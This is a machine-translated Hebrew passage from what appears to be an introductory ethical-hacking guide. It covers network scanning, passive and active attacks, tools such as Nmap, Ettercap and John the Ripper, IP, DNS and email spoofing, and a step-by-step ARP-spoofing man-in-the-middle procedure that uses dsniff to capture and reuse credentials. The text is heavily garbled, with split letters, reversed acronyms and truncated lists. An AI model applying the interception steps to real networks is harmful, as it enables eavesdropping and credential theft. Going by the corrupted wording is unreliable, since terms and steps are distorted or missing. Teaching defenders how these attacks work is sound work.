שפור סם בפומ בי ,שע שוי ל כ לו ל מידע סודי ביותר שע שוי ל ח שוףיותר מדי ע ל פעי לויות המער כת ש לך.
Machine Translated by Google
הנה טיפ :אם אתה מודע ל כך שי ש לך מידע סודי המפור סם באינ טרנ ט,יית כן שתו כ ל להוציא אותו מהאינ טרנ ט כ ל עודי ש
לך את האי שורים הנ כונים .כ ל מה שאתה צריך לע שות הוא לפנות לאנ שי התמי כה ש ל הפורום ש ל ק בוצת גוג ל או הפורום
שפר סמו את המידע הפר טי ו להגי ש דיוו ח.
מדיניות פר טיות
מדיניות הפר טיות ש ל אתר אינ טרנ ט היא דרך לאפ שר לאנ שים המ שתמ שים באתר להיות מודעים ל סוגי המידע הנא ספים
מהם ו כיצד המידע מוגן ב כ ל פעם שהם מ ב קרים באתר .עם זאת ,מדיניות פר טיות לא צרי כה ל ח שוף מידע א חר שע שוי
ל ספ ק להא קרים רעיונות כיצד הםי כו לים ל חדור למער כת.
אם אתה מת חי ל ל בנות את האתר ש לך או מנ סה ל ש כור מי שהו שי כתו ב את מדיניות הפר טיות ש לך ,דאג ש לא ת שדר את
הת שתית ש ל א ב ט חת הר שת ש לך .כ ל מידע ע ל חומת הא ש ש לך ופרו טו קו לי א ב ט חה א חריםייתן רמזים להא קרים פ לי ליים
כיצד הםי כו לים לפרוץ למער כת ש לך.
Machine Translated by Google
ביצוע סרי קות מער כת
ברגע שאתהיודע איך אתהי כו ל לא סוף מידע ע ל הר שת ש לך באופן פעי ל,יהיה לך מו שג כיצד הא קרים פ לי ליים ע לו לים
לפתו ח במת קפה נגד הר שת ש לך .הנה כמה מהד ברים שאתהי כו ל לע שות כדי לראות עד כמה המער כת ש לך פגיעה:
1.ה שתמ ש בנתונים שמצאת ב חיפו שי Whoisש לך כדי לראות כיצד ניתן לפרו ס שמות מאר חים ו כתו בות IPק שורות.
לדוגמה ,אתהי כו ל לאמת מידע ע ל האופן ש בו כמה שמות מאר חים פנימיים ,פרו טו קו לי הפע לה ,שירותים פוע לים,יציאות
פתו חות ויי שומים מוצגים ב חיפו ש באינ טרנ ט ,מה שע שוי לתת לך מו שג כיצד הא קרים פ לי ליים ע לו לים ל חדור ב קרו ב למער כת
ש לך.
2.סרו ק את המאר חים הפנימיים ש לך ודע לאי לו מ שתמ שים או לי סוררים ע שויים לג שת .ז כור כי תו קף ע שוי להגיע מתוך
הארגון ש לך ו לה קים חנות בא חד המאר חים ש לך ,ד בר שע לו ל להיות ק שה מאוד להצ ביע ע ליו.
3.בדו ק את תו כנית ה שירות Pingש ל המער כת ש לך ,או ה שתמ ש ב כ לי שירות ש ל צד ש לי שי המאפ שר לך ל בצע pingש ל
כתו בות שונות בו-זמנית .אתהי כו ל לע שות זאת ע לידי שימו ש ב כ לים כגון )NetScan Tools, fpingאם אתה מ שתמ ש
) -Unixבאו SuperScan.אם אינך מודע מהי כתו בת ה PI-ש ל ה שער ש לך ,תו כ ל ל חפ ש את כתו בת ה PI-הצי בורית ש לך ע ל
ידי מע בר ל כתו בת www.whatismyip.com.
4.בצע סרי קה מ ב חוץ פנימה ש ל המער כת ש לך ע לידי סרי קה לאיתוריציאות פתו חות .כדי לע שות זאת ,אתהי כו ל לה שתמ ש
ב כ לים כגון Nmapאו Superscan,ו לא חר מ כן ל בדו ק מה א חריםי כו לים לראות בתע בורת הר שת ש לך באמצעות כ לים כגון
Wiresharkאו Omnipeek.
ע לידי ביצוע סרי קה זו ,אתהי כו ל ל ק ב ל מו שג ע ל מה שאנ שים א חריםי כו לים לראות כ שהם סור קים את כתו בת הPI-
הצי בורית ש לך ואז מ ח ברים ת חנת ע בודהי שירות לר כזת או מע בירים את הצד הצי בורי ש ל הנת ב ש לך.
ברגע שתצ לי ח ל סרו קיציאות פתו חות ,תו כ ל לה בין שאנ שים מ ב חוץ שמ בצעים סרי קה ע ל היציאות הפתו חות ש לךי כו לים
למצוא ב ק לות את המידע ה בא:
שירותים הפוע לים ביציאות ש לך ,כגון דואר א ל ק טרוני ,אפ לי קציות מ סד נתונים ו שרתי אינ טרנ ט
שירותי גי שה מר חו ק הזמינים במער כת ש לך ,כגון שו ל חן ע בודה מרו ח ק-Windows Terminal Services. ,ו VNC
Secure Shell,
Machine Translated by Google
מ ב ט ע ל פגיעויות מער כת
ברגע שתצ לי חו לראות כיצד אנ שיםי כו לים ל חדור למער כת הא ב ט חה ש ל המ ח ש ב ש ל כם ,תו כ לו לה בין למה תו קף ע שוי לרצות ל כוון במ ח ש ב ש ל כם.
אם אינך מודע לפגיעויות ה שונות ברו ב מער כות המ ח ש ב ,תו כ ל למצוא מידע זה ע ל מ סדי נתונים ש ל פגיעות כגון
אתרים א לו מתעדים את כ ל פגיעויות המער כת הידועות ,מה שיאפ שר לך ל בצע את ההער כה הנ כונה ע בור המער כת ש לך .לא חר ביצוע ההער כה,
תו כ ל לה שתמ ש ב כ לים שונים לניהו ל ניהו ל פגיעות .בהתאם לנ קודות התורפה שהצ ל חת למצוא ,תו כ ל לה שתמ ש במידע שמצאת ע ל המער כת
ו לזהות איזו הת קפה צפויה להתר ח ש .ניתן ל בצע הת קפות א לה כדי ל בצע את הפעו לות ה באות:
כעת ,לא חר שאתם מודעים לאופן ש בו הא קריםי כו לים לזהות נ קודות תורפה במער כת ש ל כם ו ל בצע הת קפות אפ שריות בהתאם למידע שהם מצאו
ע ל הר שת ש ל כם ,הגיע הזמן שתדעו כיצד הם חודרים דרך א ב ט חת המער כת ש ל כם.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 4:ע ל הת קפות
כא שר אתה מ סת כ ל לתוך מו חו ש ל הא קר ,אתה ע שוי לה בין שי ש שני סוגים ש ל הא קרים שאתה צפוי להית ק ל בהם -
הפ סי בי והא ק טי בי .ה כרת סוגי ההת קפות שהם עו שים תאפ שר לך לה כין את עצמך להגן ע ל המער כת שאתה מנ סה להגן
ע לידי הת קנת פרו טו קו ל הא ב ט חה הנ כון.
Machine Translated by Google
מהי הת קפה פ סי בית?
הת קפה פ סי בית היא הת קפה ש בה ההא קר מ ח כה להזדמנות המו ש למת ל חדור למער כת ש לך .סוג זה ש ל הת קפה נע שה בדרך כ ל ל ע ל מנת שההא קר
יו כ ל ל ב חון את מ בנה הר שת ש לך ,סוג התו כנה ש בה אתה מ שתמ ש ,או כ ל אמצעי א ב ט חה ש כ בר הת קנת.
הת קפות פ סי ביות מתר ח שות בדרך כ ל ל כא שר הא קר עו ק ב א חר נ קודות תורפה אפ שריות ש ל המער כת מ ב לי ל בצע שינויים כ ל שהם בנתונים שא ליהם
הוא מ כוון .אתהי כו ל ל ח שו ב ע ל המת קפה הזו כאמצעי ש ל הא קר ל ח קור ע ל היעד ש לו ע ל מנת לצאת להת קפהיעי להיותר.
1.סיור א ק טי בי
זה קורה כא שר פו ל ש מ ק שי בי שירות למער כת ממו קדת ע לידי הפע לת המ טרה כדי לג לות הי כן נמצאות נ קודות התורפה .זה נע שה בדרך כ ל ל
באמצעות סרי קתיציאות ,שהיא ט ק טי קהיעי לה כדי לג לות הי כן ממו קמות היציאות הפגיעות ואיזה סוג נתונים הן מאר חות בדרך כ ל ל .לא חר
גי לוי הפגיעות ,הא קר ע לו ל לע סו ק בנ קודת תורפה זו ו לנצ ל את ה שירותים המ שוי כים א ליהם.
2.סיור פ סי בי
זה קורה כא שר הא קר בו חר ל ח קור את המער כת הממו קדת מ ב לי להפעי ל אותה באופן פעי ל ,ל לא כוונה לע סו קי שירות במ טרה .ט ק טי קות
סיור פ סי ביות כו ל לות נהיגה במ ל חמה )גי לוי ש ל ר שת א ל חו טית לא מוגנת( ,צ לי לה לא שפה )מציאת נתונים ע ל מ כ שירים או מ סמ כים שהו ש ל כו(,
או הת חפו שות )הת חזות למ שתמ ש בר שת עם הר שאה(
שתי ה ט ק טי קות ה ל לוי כו לות להיות כ לים חיוניים ב כ ל הנוגע לגי לוי נ קודות תורפה במער כת המ ח ש ב ש לך כדי לאפ שר לך למנוע הת קפות
נו ספות .ברגע שאתה מ סוג ל לה שתמ ש ב ט ק טי קות סיור ,אתהי כו ל ב ק לות למפות הי כן באמת נמצאות נ קודות התורפה ש ל מער כת המ ח ש ב
ש לך.
לא חר שתצ לי חו לזהות נ קודות פגיעות באמצעות שימו ש בהת קפות סיור מ ב חן ,ת בינו שהדרך הפ שו טה וה טו בה ביותר להגן ע ל מער כת
המ ח ש ב ש ל כם מפני ח ט טנות היא הת קנת )IPSמער כת למניעת חדירה( ,שת שמ ש ל כם כהגנה מפני ח ט טנות .סרי קותיציאות וה שי טה
האו טומ טית ש לך ל כי בוי כ ל ני סיונות ש ל סרי קתיציאות לפני שפורץ מ ק ב ל מפה מ לאה ש ל הר שת ש לך .במ ק בי ל ,תו כ לו גם להת קין חומת א ש
טו בה שת ש לו ט ע ל הנראות ש ליציאות הר שת ש ל כם.
Machine Translated by Google
מהי הת קפה א ק טי בית?
הת קפה א ק טי בית היא ניצו לי שיר בר שת ממו קדת ,ש בה הא קר שואף ליצור שינויים בנתונים או ליצור נתונים שיצרפו את
עצמם למ טרה כדי ל בצע ניצו לים נו ספים.
בהת קפה זו ,הא קר מעמיד פנים שהוא מ שתמ ש לגי טימי בר שת כדי ל ק ב ל גי שה עמו קהיותר או הר שאה טו בה
יותר .הא קר עו שה זאת בדרך כ ל ל ע לידי שימו ש במזהי מ שתמ ש ו סי סמאות פרוצים ,ע קיפת מער כת אימות או
ניצו ל פגמי א ב ט חה שהתג לו.
ברגע שהא קר מצ לי ח ל חדור למער כת עם הזהות שהוא מתיימר להיות לו ,הםי כו לים ב ק לות ל בצע שינויים או
למ חו ק כ ל תו כנה או קו בץ ,ואפי לו להעיף מ שתמ שים מור שים בר שת .הםי כו לים גם ל בצע שינויים בהגדרות הר שת
והנת ב ,מה שע שוי לאפ שר להם ל ק ב ל גי שה ל-
בהת קפה זו ,הא קר עו שה שימו ש במזהה הפע לה גנו ב ע ל מנת ליצור אימות או טומ טי בפעם ה באה שהמ טרה
ניג שת לאתר מ סוים .הת קפה זו מנצ לת את אופי האינ טרנ ט ש ל א ח סון טפ סים ,קו בצי Cookieו כתו בות URL
בדפדפן .ברגע שההא קר מ ק ב ל את הנתונים המ שמ שים את מזהה ההפע לה המ סוים באתר ממו קד ,הואי כו ל
להמ שיך להת קפת הפע לה חוזרת ,המאפ שרת לו לע שות כ ל מה שהמ שתמ ש ה לגי טימי ש ל המזההי כו ל לע שות.
מ כיוון שהת קפות שידור חוזר ש ל הפע לה אינן מתר ח שות בזמן אמת ,הת קפה זו מתג לה בדרך כ ל ל ברגע
שהמ שתמ ש ה לגי טימי מג לה אי התאמות ב ח ש בונו .רו ב הזמן ,קור בנות ש ל הת קפת שידור חוזר ר ק מג לים
שה ח ש בונות ש להם נפגעו ר ק כא שר כ בר התר ח שה גני בת זהות.
מת קפת DoSמוגדרת כמניעת גי שה או שירות למ שתמ ש לגי טימי -אתהי כו ל לראות ש כ ל ה שירותים שפוע לים
במ ח ש ב ש לך מא טים או נ סגרים בפתאומיות בזמן שאתה מ שתמ ש בהם .מת קפת DDoS,לעומת זאת ,כו ל לת
מ ספר גדו ליותר ש ל מער כות שנפגעו בע בר ע לידי הא קר כדי לת קוף מ טרה מ סוימת.
בעוד שהת קפות -DDoSו DoSאינן מ שמ שות לה שמדת מער כת הא ב ט חה ש ל מ טרה או לגני בת נתונים ,ניתן
לה שתמ ש בהן כדי לייצר או בדן רוו ח או להפוך מער כת מ ח ש ב ח סרת תוע לת ל ח לו טין בזמן ה שימו ש בה .בדרך
כ ל ל ,הת קפות א לו נע שות כדי ליצור או בדן זמני ב קי שוריות בר שת ו ל ש לו ל את כ ל ה שירותים ה ק שורים .במ קרים
מ סוימים ,הת קפות א לוי כו לות גם להרו ס ק בצים מ סוימים
Machine Translated by Google
ותו כניות במ ח ש ב ממו קד.
הת קפת DoSאו DDoSדומה מאוד ל חי בור אינ טרנ ט אי טי ומ ח ש ב אי טי בו זמנית .במה לך הת קפה כזו ,אתה ע לו ל
להרגי ש ש ביצועי הר שת ש לך אי טיים בצורהיוצאת דופן ואינךי כו ל לג שת לאף אתר.י חד עם זאת ,ק לי ח סית גם
לג לות אם אתה ממו קד להת קפה -אתה ע לו ל לראות שאתה מ ק ב ליותר מדי ספאם או סימנים א חרים ש ל תנועה
חריגה.
כעת ,לא חר שי ש לך מו שג לג בי סוגי ההת קפות שהא קר ע לו ל להפעי ל ,הגיע הזמן שת למד כיצד הא קרי כו ל להפעי ל אותן
ו לה כין את עצמך ל בצע צעדי נגד.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 5:כ לי פריצה
גם להא קרים אתיים וגם לפ שעיםי ש גי שה ל שפע ש ל כ לי פריצה שניתן לה שתמ ש בהם כדי לת קוף או להגן ע ל מער כת מ סוימת .כ לים א להי כו לים להיות
מ קורות המונים מהאינ טרנ ט דרך פורומים ומר כזים מ קוונים א חרים המו קד שים להא קרים.
כהא קר אתי מת חי ל ,ח שו ב מאוד שת למד את ה כ לים הנפוצים ביותר לאיתור נ קודות תורפה אפ שריות ,ביצוע בדי קות וניהו ל פריצות בפוע ל .לה לן 8
מה כ לים הפופו לריים ביותר בהם מ שתמ שים הא קרים כיום:
המ כונה הפופו לרית ביותר ב שם ipscanע לידי הא קרים ותי קים ,ה כ לי הזה מ שמ ש למע ק ב א חר מ ח ש בים דרך כתו בות ה PI-ש להם וגם
ל חיפו ש א חריציאות כדי ל בדו ק שערים שיו בי לו אותם היי שר למער כת מ ח ש בים ממו קדת .כ לי זה נמצא ב שימו ש נפוץ גם ע לידי מהנד סי מער כת
ומנה לי מער כת כדי ל בדו ק פגיעויות אפ שריות במער כות שהם מ טפ לים בהן.
ה כ לי הזה הוא קוד פתו ח וניתן לה שתמ ש בו ע ל פני פ ל טפורמות ,והוא זו כה ל ש ב חים ע ל היותו א חד ה כ לים היעי לים ביותר לפריצה ש קיימים
ב שו ק.
2.קא לי לינו ק ס
יי שום זה ,שהו ש ק ב שנת 2015,הוא א חד המועדפים ע ל הא קרים בג ל ל שפע הת כונות .ער כת כ לים זו הממו קדת בא ב ט חה מאפ שרת לך
להפעי ל אותהי שירות מת ק לי טור או דרך USB,ל לא צורך בהת קנה כ ל שהי.
ער כת כ לים זו מ כי לה את רו ב הממ ש קים הדרו שים לך לפריצה ,ה כו ל לתיצירת ר שתות מזויפות ,הודעות זיוף ואפי לו סי סמאות WiFiלפיצו ח.
3.קין וה ב ל
Cain & Abelהוא א חד מער כי הפריצה היעי לים ביותר הפוע לים הי ט ב מו ל מער כות ההפע לה ש ל מי קרו סופ ט .כ לי זה מאפ שר לך ל ש חזר
סי סמאות לר שת א ל חו טית ,סי סמאות ל ח ש בונות מ שתמ ש ו לה שתמ ש ב כמה שי טות כו ח ג ס ב כ ל הנוגע לפיצו ח סי סמאות .אתהי כו ל גם
לה שתמ ש בו כדי לה ק לי ט הפע לות ש ל שי חות VoIP.
4.סווי טת בורפ
Burp Suiteהוא א חד ה כ לים ה חיוניים ביותר ש בהם אתהי כו ל לה שתמ ש כא שר אתה רוצה למפות נ קודות תורפה באתר .כ לי זה מאפ שר לך
ל ב חון כ ל קו בץ cookieשנמצא באתר ,וגם להת חי ל חי בורים בתוךיי שומי אתר.
Machine Translated by Google
5. Ettercap
ה כ לי הזהיעי ל ב כ ל הנוגע להפע לת אדם באמצע הת קפות ,שנועד לגרום ל שתי מער כות שונות להאמין שהן
מת ק שרות זו עם זו ,א ב ל הא קר מע ביר ב סתר מ סר א חר לא חר .כ לי זהיעי ל במניפו לציה או גני בת ע ס קאות או
הע ברת נתונים בין מער כות ,או לצותת ל שי חה.
6.ג'ון המר ט ש
זהו א חד מפצ חי ה סי סמאות ה טו בים ביותר ש ל כו ח ג ס המ שתמ שים במת קפת המי לון .בעוד שרו ב ההא קרים ע שויים
ל ח שו ב ש ט ק טי קות כו ח ג ס כו ל לותיותר מדי זמן לפיצו ח סי סמה,ידוע שthe Ripper nhoJ-הוא א חד ה כ לים
היעי ליםיותר ב כ ל הנוגע ל ש חזור סי סמאות מוצפנות.
7. Metasploit
Metaspoitזו כה להער כה ר בה ב קר ב הא קרים מ כיוון שהוא כ לייעי ל ב כ ל הנוגע לזיהוי בעיות א ב ט חה אפ שריות
וגם לאימות הפגות ש ל פגיעויות מער כת .זהו גם א חד מ כ לי ההצפנה ה טו בים ביותר ע בור הא קרים מ כיוון שהוא גם
יעי ל כ שמדו בר במי סוך זהויות ומי קומים ש ל הת קפה.
כ לים א לה מ שמ שיםי חד כדי לזהות חי בורים א ל חו טיים ו לפרוץ מזהי מ שתמ ש ו סי סמאות ב חי בור WiFi. Wireshark
מ שמ ש כר חר ח מנות-Aircraft-ng ,ו מ שמ ש כ ח בי לת ל כידת מנות שתאפ שר לך גם לה שתמ ש במגוון כ לים א חרים
כדי לנ טר את א ב ט חת -WiFi.ה
כעת ,לא חר שי ש לך ר שימה ש ל כ לים ש בהם תו כ ל לה שתמ ש כדי לתרג ל פריצה ו כדי לג לות גם נ קודות תורפה במער כת
מ ש לך ,כעת תו כ ל ל חפור עמו קיותר לתוך ט ק טי קות הפריצה הנפוצות ביותר ו לג לות כיצד הן נע שות.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 6:איך ל ש טות במ טרות
הא קר טו ב הוא חו קר מומ חה; הוא מ סוג ל להי שאר לא מזוהה ע לידי שהוא נמצא מת חת לרדאר ש ל מנה לי ר שת ע לידי
הת חזות למי שהו א חר .כדי שההא קריע שה זאת ,הוא עו שה שימו ש ב ט כני קות זיוף או הת חזות.
Machine Translated by Google
זיוף
זיוף ,כפי ש כ בר קראתם בפר ק ה קודם ,מתיי ח ס ל ט כני קת ההונאה ש בה הא קר מ ח קה או מעמיד פנים שהוא אדם א חר,
ארגון ,תו כנה או אתר אינ טרנ ט א חר .זה בא מתוך כוונה לע קוף את פרו טו קו לי הא ב ט חה ש ל המ טרה ע ל מנת ל ק ב ל גי שה
למידע שהא קר רוצה ל ק ב ל .לה לן כמה מ ט כני קות הזיוף הנפוצות ביותר שהא קרים מ שתמ שים בהן:
1.זיוף IP
ט כני קה זו נע שית כדי לה סוות את כתו בת ה PI-ש ל מ ח ש ב שההא קר מ שתמ ש בו כדי לרמות ר שת ל ח שו ב
שמ שתמ ש לגי טימי מת ק שר עם מ ח ש ב ממו קד .ל שם כך ,הא קר מ ח קה כתו בת IPאו טוו ח א חר כדי לעמוד
ב קרי טריונים ש ל כתו בת ה PI-שנ ק בעו ע לידי מנה ל ר שת.
ט כני קת פריצת זיוף זו פוע לת ע לידי מציאת כתו בת IPש בה מ שתמ ש מאר ח מהימן .לא חר שתע שה זאת ,תו כ ל
ל שנות את כותרות ה ח בי לות כדי לה טעות את הר שת להאמין שהיא מגיעה ממ שתמ ש מור שה .בדרך זו ,אתהי כו ל
ל ש לו ח מנות מזי קות לר שת ממו קדת ,מ ב לי שיוותרו א ליך.
2.זיוף DNS
זיוף DNSפוע ל ע לידי שימו ש ב כתו בת ה PI-ש ל אתר אינ טרנ ט כדי ל ש לו ח מי שהו לאתר זדוני ש בו הא קרי כו ל
ב ק לות לא סוף מידע פר טי או אי שורי מ שתמ ש .הת קפת האי ש באמצע מאפ שרת לך לת ק שר עם מ טרה תמימה
ל ח שו ב שהוא נ כנ ס לאתר שהוא חיפ ש ,ואז לאפ שר להא קר ל ק ב ל באופן חופ שי פר טי ח ש בון שהמ שתמ ש הזהיזין
באתר ש קרי.
כדי שזהיע בוד ,ההא קר צריך להיות באותו LANכמו היעד .ע ל מנת לה שיג גי שה לאותו LAN,הא קרי כו ל פ שו ט
ל חפ ש סי סמה ח ל שה במ כונה שמ חו ברת לאותה ר שת ,ד בר שניתן אפי לו לע שות מר חו ק .ברגע שזה נע שה
בהצ ל חה ,הא קרי כו ל להפנות מ שתמ שים ל ל כת לאתר אינ טרנ ט מזויף ו לפ ק ח ע ל כ ל הפעי לויות שהםיע שו שם.
3.זיוף באימיי ל
זיוף דוא" ל שימו שי מאוד כא שר מדו בר ע ל ע קיפת שירותי א ב ט חה המוע ס קים ב שירות דוא" ל .המ שמעות היא
ש כא שר כתו בת דוא" ל מזויפת ,שירות הדואר הא ל ק טרונייזהה כ ל דואר שנ ש ל ח מ ח ש בון מזויף כ לגי טימי ו לאיופנה
לתי בת הדואר הז ב ל .ט כני קה זו מאפ שרת להא קר ל ש לו ח מיי לים עם ק בצים מצורפים זדוניים למ טרה מ סוימת.
זיוף מ ספרי ט לפון מ שתמ ש בדרך כ ל ל באזורי חיוג או מ ספרי ט לפון כוז בים כדי לה סוות את המי קום או הזהות ש ל
הא קר .ט ק טי קה זו מאפ שרת להא קרים לה קי ש בהצ ל חה ע ל הודעות דואר קו לי ש ל היעדים ש להם ,ל ש לו ח הודעות
ט ק ס ט באמצעות מ ספר מזויף ,או לה טעותיעד שממנו ה שי חה
Machine Translated by Google
מגיע -כ ל ה ט ק טי קות הא להיעי לות מאוד כ שמני חים את ה ב סי ס להת קפות הנד סה ח ברתית.
הנז ק ש ל הת קפות הת חפו שות או זיוף נעוץ בעו בדה שהן לא מזוהות ב ק לות ע לידי רו ב מנה לי הר שת .ה ח ל ק הגרוע ביותר
הוא שמנה לי ר שת ופרו טו קו לי הא ב ט חה המות קנים מאפ שרים למ שתמ שים זדוניים ליצור אינ טרא קציה עם מ שתמ שים
א חרים דרך הר שת ואפי לו לתפע ל ,לעצור או לה חדיר זרם נתונים למער כת הממו קדת .מ כיוון שהא קר שמ סוג ל ל חדור
לר שתי כו ל ב ק לות לה קים חנות בא חד המאר חים או במ כ שירים מניפו לציות במער כת ,ק ל לו ל בצע הת קפות אדם באמצע.
Machine Translated by Google
הת קפות אדם -באמצע
הת קפת אדם באמצע הופ כת לפעו לת מע ק ב הגיונית מאוד ע בור הא קר פ לי לי לא חר שהוא מ בצע בהצ ל חה מת קפת זיוף.
בעוד ש ח ל ק מהא קרים פ סי בייםי סתפ קו ב כך שהם פ שו טי כו לים לצפות בנתונים הדרו שים לו ו להימנע ממניפו לציה תוך כדי
האזנה למאר ח פגיע ,ח ל קם ע שויים לרצות ל בצע הת קפה א ק טי בית מיד לא חר שהצ לי חו ל בצע הת קפת זיוף בהצ ל חה.
מת קפת man-in the middleי כו לה להת בצע כא שר הא קר מ בצע זיוף ARP,הנע שה ע לידי ש לי חת הודעות שווא ש ל
Address Resolution Protocol,או ARP,דרך הר שת המ קומית ש חדרה א ליה .כא שר נ ש לפו בהצ ל חה ,הודעות הPRA-
המזויפות מאפ שרות ל קי שור מוצ ל ח ש ל כתו בת ה CAM-ש ל ההא קרים ל כתו בת IPש ל מ שתמ ש לגי טימי או שרת ש לם בר שת
ממו קדת .ברגע שההא קריו כ ל ל ק שר את כתו בת ה CAM-ש לו ל כתו בת IPלגי טימית ,ההא קריו כ ל ל ק ב ל את כ ל הנתונים
שמ שתמ שים א חרים דרך הר שת שו ל חים ל כתו בת ה PI-ש בה הוא מ שתמ ש .מ כיוון ש כ ברי ש לו גי שה ל כ ל הנתונים שהמ שתמ ש
הפרוץ )ה בע לים ש ל כתו בת ה (PI-מזין ו למידע שהוא מ ק ב ל בר שת ,ההא קרי כו ל ל ב חור ל בצע את הפעו לות ה באות במה לך
ס שן זיוף ש ל ARP:
1.טיפת הפע לה -זה מאפ שר להא קר לה שתמ ש ב PRA-המזויף כדי לגנו ב ח
מזהה הפע לה ש ל מ שתמ ש ,ו לא חר מ כן לה שתמ ש באי שורים א לה במועד מאו חריותר כדי ל ק ב ל גי שה ל ח ש בון.
2. הת קפת מניעת שירות –הת קפה זוי כו לה להיע שות כא שר זיוף ARPנע שה
כדי ל ק שר מ ספר כתו בות IPמרו בות ל כתו בת MACש ל מ כ שיר ממו קד .מה ש קורה ב סוג זה ש ל הת קפה הוא ש כ ל
הנתונים שנ ש ל חים כ בי כו ל ל כתו בות IPא חרות מופנים במ קום זאת למ כ שיר בודד ,מה שע לו ל לגרום לעומ סיתר
ש ל נתונים .תו כ ל לדעתיותר ע ל הת קפות DoSבפר ק מאו חריותר.
הת קפת אי ש -באמצע -ההא קר מעמיד פנים שהוא לא קיים בר שת ,ו לא חר מ כן 3.
מייר ט או מ שנה הודעות שנ ש ל חות בין שני קור בנות אויותר.
הנה איך הא קר ע שוי ל בצע זיוף ARPכדי ל בצע הת קפת אדם באמצע באמצעות כ לי שנ קרא Backtrack,ער כת כ לים
לפריצה הדומה ל קא לי לינו ק ס:
ניתן לע שות זאת ע לידי שימו ש ב כ לים -tcpdump.ו Wireshark, dsniffע לידי הפע לת ה כ לים הא לה ,אתהי כו ל
לראות את כ ל התע בורה שאתהי כו ל להת ח בר א ליה דרך ר שתות א ל חו טיות או קוויות.
כא שר אתה מצי ב את המתאם הא ל חו טי או -NICה ש לך למצ ב מוני טור ,תו כ ל ל ק לו ט את כ ל התע בורה הזמינה ל חי בור
ש לך ,גם את א לה שאינן מיועדות ל כתו בת ה PI-ש לך .אם אתה מ חו בר לר שתות ר כזת ,אתהי כו ל לא סוף את התע בורה
שאתה צריך ל לא כ ל קו שי.
Machine Translated by Google
עם זאת ,אם אתם מת כננים ל חדור למער כת מיתוגית,יית כן שתצ טר כו ל ב חור ב ט ק טי קה א חרת ,ש כן מתגים מוו סתים
את התע בורה ומ ב טי חים שמנות נתונים ספציפיות נ ש ל חות ל כתו בות MACאו כתו בות IPספציפיות.
אם אתה רוצה לע קוף מתגים ,או לפ חות לדעת אי לו סוגי מידע נ ש ל חים למ שתמ שים א חרים ,אתהי כו ל לנ סות ל שנות
את הער כים ב ט ב לת CAMשממפה כתו בות IPו CAM-ש שו ל חות מידע זה לזה .אם ת שנה את הער כים ,תו כ ל לה שיג
בהצ ל חה את התע בורה המיועדת למי שהו א חר .ל שם כך ,ע ליך ל בצע הת קפת זיוף ARP.
ש ל ב 3:הפע ל Backtrack
ברגע שאתה מ סוג ל למ שוך את Backtrackלמע לה ,מ שוך למע לה ש לו שה מ סופים .לא חר מ כן ,וע שה את הפעו לות ה בא
2. הפוך את ה סדר ש ל כתו בות ה PI-במ חרוזת ה קודמת ש בה ה שתמ שת .זהיגיד
ל שרת שהמ ח ש ב ש לך הוא ה ל קו ח.
3. כעת כ שאתה מעמיד פנים שאתה גם ה שרת וגם ה ל קו ח ,כעת תצ טרך להיות
מ סוג ל ל ק ב ל את ה ח בי לות מה ל קו ח ואז להע ביר אותם ל שרת ,וגם לע שות הפוך.
אם אתה מ שתמ ש ב לינו ק ס ,אתהי כו ל לע שות שימו ש בת כונה המו בנית ש לו ב שם ip_forward,שי כו לה
לאפ שר לך להע ביר מנות שאתה מ ק ב ל .לא חר שתפעי ל את זה ,תו כ ל להע ביר את ה ח בי לות באמצעות
ipforwardingע לידי הזנת פ קודה זו -Backtrack:ב
לא חר שתזין פ קודה זו ,המער כת ש לך תמו קם בדיו ק באמצע ה ל קו ח וה שרת .זה אומר שאתהי כו ל כעת ל ק ב ל
ו להע ביר נתונים שנ ש ל חו בין ה ל קו ח ל שרת.
כעת ,כא שר אתהי כו ל ל ק ב ל את כ ל התע בורה הנ ש ל חת א ל ה ל קו ח ומה שרת וממנו ,תו כ ל למצוא את כ ל
התע בורה הזמינה .כדי לע שות זאת ,הפע ל כ לי סניפר -Backtrackב ע לידי הזנת הפ קודה "dsniff".לא חר
שתע שה זאת ,תראה שה ffinsd-מופע ל ומאזין לתע בורה הזמינה.
מ כיוון שגם מ שתמ שים וגם מנה לי מער כת מ שתמ שים באותם אי שורים ב כ ל ה שירותים או מער כות המ ח ש ב,
אתהי כו ל לה שתמ ש באי שורים שאתהי כו ל ל ק ב ל כדי להי כנ ס.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 7:פריצת סי סמאות
סי סמאות הן בין המ טרות הנפוצות ביותר ש ל הא קרים פ שו ט מ כיוון שפריצת סי סמאות היא בין ה טרי קים ה ק לים ביותר
ל ביצוע .בעוד שרו ב האנ שים חו ש בים ש ק שה לפיצו חיצירת בי טויי סי סמה ארו כים ,הא קרים מודעים ל כך שרו ב האנ שים בדרך
כ ל ל מתע למים מהגנה ע ל אי שורי המ שתמ ש ש להם.
פר טי הת ח ברות סודיים ,כגון סי סמאות ,הם בין ה חו ליות ה ח ל שות ביותר בא ב ט חה ט כנו לוגית מ כיוון שזוהי ת כונת הא ב ט חה
המ סתמ כת ר ק ע ל סודיות .ברגע שה סוד הזה דו לף ה חוצה ,כ ל הא חריות נמצאת מ חוץ ל ח לון והמער כות נפגעות ב ק לות.
אם אתה נ כנ סי שירות לתודעתו ש ל תו קף ,אתה ע שוי לה בין שי ש הר בה דר כים לדעת מהי ה סי סמה ש ל מ שתמ ש מ כיוון
שי ש להיותר מדי פגיעות .ה בעיה הגדו לה ביותר ש ל ה סתמ כות ע ל סי סמאות לא ב ט חה היא ש לעתים קרו בות מ שתמ ש
מ ספ ק את פר טי המ שתמ ש ש לו גם למ שתמ שים א חרים .בעוד שמ שתמ ש ע לו ל למ סור את ה סי סמה ש לו ב כוונה או ש לא
ב כוונה ,ברגע שה קוד ה סודי הזהיצא ,אין שום דרך לדעת מי עודיודע מה זה .ב ש ל ב זה ,ח שו ב לדעת ש כא שר מי שהויודע
מהי ה סי סמה ש ל מ שתמ ש ,זה לא הופך את אותו אדם למ שתמ ש מור שה בר שת.
Machine Translated by Google
איך לפצ ח סי סמאות
אם הא קר לאי כו ל לדעת את ה סי סמה ש ל מ שתמ ש באמצעות ה ס קה ,הנד סה ח ברתית והת קפה פיזית )ע ל מנת לדון בהר ח בה בפר קים מאו חריםיותר(,
הואי כו ל במ קום זאת לה שתמ ש במ ספר כ לים לפיצו ח סי סמאות ,כגון:
